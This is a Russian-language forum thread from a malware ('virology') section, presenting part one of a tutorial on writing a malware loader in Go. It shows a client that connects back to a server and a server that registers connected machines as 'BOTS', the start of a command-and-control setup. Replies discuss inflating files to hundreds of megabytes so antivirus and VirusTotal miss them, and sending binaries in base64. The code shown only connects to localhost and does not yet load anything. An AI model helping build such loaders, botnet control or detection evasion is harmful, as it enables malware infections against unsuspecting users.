Загрузка...

[ЧАСТЬ 1] Пишем нативный LOADER за 15 минут на GoLang

Тема в разделе Вирусология создана пользователем SexyWare 5 июн 2023. (поднята 13 июн 2023) 1705 просмотров

Сортировать
  1. SexyWare
    Кому понравилось (20)
    SexyWare Автор темы 5 июн 2023 РЕЗИДЕНСКИЕ ****** - @SocksWare_bot 41 12 май 2023
    [IMG][IMG]
    [IMG]
    [IMG]
    [IMG]
    [IMG]
    ПРОДОЛЖЕНИЕ В СЛЕДУЩЕЙ ЧАСТИ
    Ждем ваше мнение и предложения в коментариях
    Код
    package main
    

    
import (
    
    "net"
    
    "bufio"
    
    "log"
    
)
    

    
func main() {
    
    for {
    
        conn, err := net.Dial("tcp", "127.0.0.1:8081")
    
        if err == nil {
    
            conn.Write([]byte("Hello\n"))
    
            for {
    
                message, err := bufio.NewReader(conn).ReadString('\n')
    
                if err == nil {
    
                    log.Print(message)
    
                }
    
            }
    
        }
    
    }
    
}
    Код
    package main
    

    
import (
    
    "net"
    
    "bufio"
    
    "log"
    
    "sync"
    
    "strings"
    
)
    

    
var BOTS sync.Map
    

    
func main() {
    
      log.Print("[SERVER] - Started")
    
      ln, err := net.Listen("tcp", ":8081")
    
      if err == nil {
    
          for {
    
            conn, err := ln.Accept()
    
            if err == nil {
    
 
    
                IP := strings.Split(conn.RemoteAddr().String(),":")[0]
    
                BOTS.Store(IP, conn)
    

    
                go func(conn net.Conn) {
    
                    for {
    
                        message, err := bufio.NewReader(conn).ReadString('\n')
    
                        if err == nil {
    
                            log.Print(message)
    
                        } else {
    
                            return
    
                        }
    
                    }
    
                }(conn)
    
            }
    
        }
    
    }
    
}
     
    5 июн 2023 Изменено
  2. kingofchocopie
    Кому понравилось (1)
    kingofchocopie 5 июн 2023 :life: 3704 13 мар 2023
    Текстом было бы удобнее
     
    5 июн 2023
    1. Посмотреть предыдущие комментарии (1)
    2. kingofchocopie
      5 июн 2023
    3. SexyWare Автор темы
      kingofchocopie, В кодинг лезешь, забывай об 'было бы удобнее'
      5 июн 2023 Изменено
    4. kingofchocopie
      5 июн 2023
  3. iwakura_inactive7021651
    Кому понравилось (2)
    iwakura_inactive7021651 5 июн 2023 невидимка 151 3 май 2023
    что-ж, голанг для такого рода софта - выбор, конечно, интересный
    одно дело его для сервера использовать, для клиента же - совершенно другое
    касаемо кода могу сказать лишь то, что текстовый протокол здесь не уместен, больше критиковать тут нечего
    смысл разделения на столь маленькие части мне не ясен, в конечном итоге читать всё это будет очень не удобно
     
    5 июн 2023
    1. Посмотреть предыдущие комментарии (6)
    2. iwakura_inactive7021651
      SexyWare, >Чем плох метод отправить бинарник в base64?)
      да банальным оверхедом
      >Для лоудера за 15 минут это не имеет значения
      не нужно оправдывать идиотские решения нехваткой времени, за те же условные 15 минут можно было придумать куда лучше
      >пампа
      просвяти
      >По поводу реверса, из Go ты не вытянешь исходники
      ткни меня в место, где было сказано обратное
      >Для Go не имеет значения что я шлю, я легко []byte переведу в string и в обратном порядке
      это вообще к чему?
      6 июн 2023
    3. SexyWare Автор темы
      iwakura_inactive7021651, Памп, сейчас никто не льет PE по 50кб, памп минимум 300мб, но большенство дует файл до 700мб чтобы не сливали на вт
      Реверс: можешь смело публиковать исходники всех написанных тобою малварей!
      Насчет идиотских решений, лоудер изначально не рассчитывался на отправку бинарника по сокету, если ты читал мой мануал я там указал что будет обработчик команд, это самый простой способ его реализовать) Знаешь лучше? Научи
      6 июн 2023
    4. iwakura_inactive7021651
      SexyWare, >Памп, сейчас никто не льет PE по 50кб, памп минимум 300мб, но большенство дует файл до 700мб чтобы не сливали на вт
      вот оно как, хорошо
      >Реверс: можешь смело публиковать исходники всех написанных тобою малварей!
      посыл был не в "тривиальности реверса программ на go", а в "неправильности твоих оценок способностей реверсеров, в лучшую для тебя сторону", если ты не понял
      >лоудер изначально не рассчитывался на отправку бинарника по сокету
      только в статье об этом не было ни слова, как и об остальной схеме работы лоадера
      >если ты читал мой мануал я там указал что будет обработчик команд, это самый простой способ его реализовать
      суть в том, что работа с текстом накладывает на тебя ограничения и неудобства: невозможность без костылей и оверхеда встраивать бинарные фрагменты и необходимость либо в экранировании, либо вообще в запрете использования определенных символов в некоторых частях протокола. с бинарным же таких проблем нет. единственное, если делать с полного нуля, парсить каждое значение может быть неудобным. но есть готовые решения, избавляющие от этой проблемы
      6 июн 2023
    5. Посмотреть следующие комментарии (4)
  4. AskOngaku
    Кому понравилось (1)
    AskOngaku 5 июн 2023 Заблокирован(а) 3 7 ноя 2022
    когда прода?))0
     
    5 июн 2023
    1. SexyWare Автор темы
      6 июн 2023
  5. SKINSLOL
    Кому понравилось (1)
    SKINSLOL 6 июн 2023 услуги кодера: zelenka.guru/threads/6892475/ 49 24 сен 2021
    проду срочно)
     
    6 июн 2023
  6. onechance
    Кому понравилось (2)
    onechance 6 июн 2023 i luv u гость <3 874 6 июн 2022
    статья ахуенная, но чел старался, а ему 6 симпатий(
     
    6 июн 2023
  7. onechance
    onechance 25 июн 2023 i luv u гость <3 874 6 июн 2022
    когда 2 часть?
     
    25 июн 2023
  8. Ostap999
    Ostap999 23 окт 2023 0 29 сен 2022
    Да когда 2я чась?
     
    23 окт 2023
Загрузка...
Top